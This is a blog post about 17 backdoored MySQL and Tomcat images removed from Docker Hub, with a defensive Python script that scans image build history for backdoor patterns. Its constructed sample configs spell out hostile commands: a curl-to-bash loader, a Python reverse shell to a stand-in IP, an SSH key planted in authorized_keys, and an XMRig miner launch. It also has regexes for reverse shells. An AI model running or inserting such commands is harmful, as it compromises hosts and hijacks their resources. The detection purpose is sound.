Docker Hub recently removed 17 backdoored Docker images. This action came after Fortinet reported some cryptomining activity which linked back to these images. Here are some of the interesting facts:

Backdoors were hidden inside the MySQL and Tomcat images, which are some of the most popular application containers on Docker Hub.

These backdoored images were uploaded as far back as May 2017 and had been in active use for over a year before the backdoors were discovered.

Some of these images had already been pulled more than one million times, and some affected servers may still be compromised and can no longer be tracked.

It took quite a while before end users noticed the malicious activity taking place.

The hidden backdoors or malicious programs included: Python Reverse Shell, Bash Reverse Shell, adding the attacker’s SSH key, embedded cryptocoin mining software, and more.

Cryptomining software was embedded in many of these images. Once a container built from one of them starts, the loader either downloads a payload disguised as a .jpg file and runs it with bash, or downloads a .sh script and runs it with bash; in both cases the script then deploys the mining software. Attackers are using poisoned Docker images to install XMRig-based Monero miners, and the uploader behind these images, using the username “docker123321”, is reported to have mined 544.74 Monero (about $90,000) on victims’ systems. As this is being written, the latest news is that the South Korean cryptocurrency exchange Bithumb was hacked and $30 million in coins was stolen.
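The backdoor types listed above (reverse shells, a planted SSH key, a miner) and the download-and-pipe-to-bash loader all leave traces in the build commands recorded in an image's config. The script below is an added example written for this post, not code from the original article and not Docker's or NeuVector's own tooling: it statically audits an image config for those patterns. It assumes the JSON that `crane config IMAGE` or `skopeo inspect --config docker://IMAGE` prints (the `history[].created_by` strings are the same text `docker history --no-trunc` shows). The sample configs, IP addresses, commands and the regexes themselves are constructed to mimic the techniques described; they are not taken from the real images.

```python
"""Static audit of an OCI image config for the backdoor patterns described above.

Example code for this post (not the article's or any project's code). Input is the
image config JSON from `crane config IMAGE` or `skopeo inspect --config docker://IMAGE`.
Each layer's recorded build command and the final ENTRYPOINT/CMD are matched against
the techniques the article lists. This is plain string matching on build commands:
it catches backdoors planted through the Dockerfile, not payloads hidden only in
layer filesystems or fetched at run time by an innocent-looking script.
"""
import json
import re
import sys

# One rule per technique from the article. The regexes are this example's own.
RULES = [
    # curl/wget output piped straight into a shell (the loader step)
    ("pipe-download-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba)?sh\b")),
    # a shell executing a file disguised with an image extension (the .jpg trick)
    ("non-script-run-by-shell",
     re.compile(r"\b(ba)?sh\s+(-[A-Za-z]+\s+)*\S+\.(jpe?g|png|gif|bmp|ico)\b")),
    # classic bash reverse shells: /dev/tcp redirection, bash -i, nc -e
    ("reverse-shell-bash",
     re.compile(r"/dev/(tcp|udp)/|\bbash\s+-i\b|\bnc\b[^;|&]*\s-e\s")),
    # python reverse shells: socket+connect, pty.spawn, or spawning /bin/sh
    ("reverse-shell-python",
     re.compile(r"socket\.socket\(.*\.connect\(|pty\.spawn\(|"
                r"subprocess\.call\(\s*\[\s*[\"']/bin/(ba)?sh")),
    # any write to authorized_keys in a build step is a planted key until proven otherwise
    ("ssh-key-planted", re.compile(r"authorized_keys")),
    # XMRig-family miner binaries and the stratum mining protocol
    ("known-miner",
     re.compile(r"\b(xmrig|minerd|cpuminer|cryptonight|stratum\+tcp)\b", re.I)),
]


def _commands(config):
    """Return (where, command) pairs: each layer's build command, then ENTRYPOINT and CMD.

    Docker records RUN layers as "/bin/sh -c <cmd>" and metadata-only layers as
    "/bin/sh -c #(nop) ...", so the rules are applied to that full recorded text."""
    out = []
    for i, entry in enumerate(config.get("history", [])):
        out.append(("layer[%d]" % i, entry.get("created_by", "")))
    cfg = config.get("config", {})
    for key in ("Entrypoint", "Cmd"):
        if cfg.get(key):
            out.append((key.upper(), " ".join(cfg[key])))
    return out


def audit_image_config(config, expected_process=""):
    """Return a list of findings (empty means no rule fired).

    expected_process: substring the image's real launch command should contain
    (e.g. "mysqld" or "catalina.sh"); a final ENTRYPOINT/CMD without it is flagged."""
    findings = []
    for where, cmd in _commands(config):
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append({"rule": name, "where": where, "command": cmd})
    if expected_process:
        cfg = config.get("config", {})
        launch = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        if expected_process not in launch:
            findings.append({"rule": "unexpected-process", "where": "ENTRYPOINT/CMD",
                             "command": launch})
    return findings


# Constructed sample configs mimicking the techniques described; not the real images.
SAMPLE_MYSQL_CONFIG = {
    "config": {"Entrypoint": ["docker-entrypoint.sh"], "Cmd": ["mysqld"]},
    "history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:9b4b6d3d4c1f in /"},
        {"created_by": "/bin/sh -c apt-get update && apt-get install -y curl"},
        {"created_by": "/bin/sh -c curl -s http://198.51.100.7/logo.jpg | bash"},
        {"created_by": "/bin/sh -c wget -qO /tmp/a.jpg http://198.51.100.7/a.jpg && bash /tmp/a.jpg"},
        {"created_by": "/bin/sh -c mkdir -p /root/.ssh && echo 'ssh-rsa AAAAexample attacker' >> /root/.ssh/authorized_keys"},
        {"created_by": "/bin/sh -c python -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('198.51.100.7',4444));os.dup2(s.fileno(),0);subprocess.call(['/bin/sh','-i'])\""},
        {"created_by": "/bin/sh -c nohup /tmp/xmrig -o stratum+tcp://pool.example.net:3333 -u 4Aexample &"},
        {"created_by": "/bin/sh -c #(nop)  CMD [\"mysqld\"]"},
    ],
}
SAMPLE_TOMCAT_CONFIG = {
    "config": {"Entrypoint": None,
               "Cmd": ["sh", "-c", "curl -s http://198.51.100.7/catalina.jpg | bash"]},
    "history": [{"created_by": "/bin/sh -c #(nop) ADD file:0a1b2c in /"}],
}

if __name__ == "__main__":
    # usage: audit.py [config.json [expected-process]]; no args runs the built-in sample
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            config = json.load(fh)
        expected = sys.argv[2] if len(sys.argv) > 2 else ""
    else:
        config, expected = SAMPLE_MYSQL_CONFIG, "mysqld"
    for hit in audit_image_config(config, expected):
        print("%-24s %-14s %s" % (hit["rule"], hit["where"], hit["command"][:80]))
```

Run it against every image a host pulls, not just the ones you built: the tomcat sample shows why the `expected_process` check matters, since a CMD that fetches a "jpg" and pipes it to bash fires both the loader rule and the unexpected-process rule, even with a clean layer history. Treat a hit as a reason to inspect the layer filesystem, not as proof; a clean result only means the backdoor was not planted through the recorded build commands.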

Read the entire article here: 17 Backdoored Malicious Images Removed From Docker Hub, But Are You Really Any Safer?

Via the fine folks at NeuVector.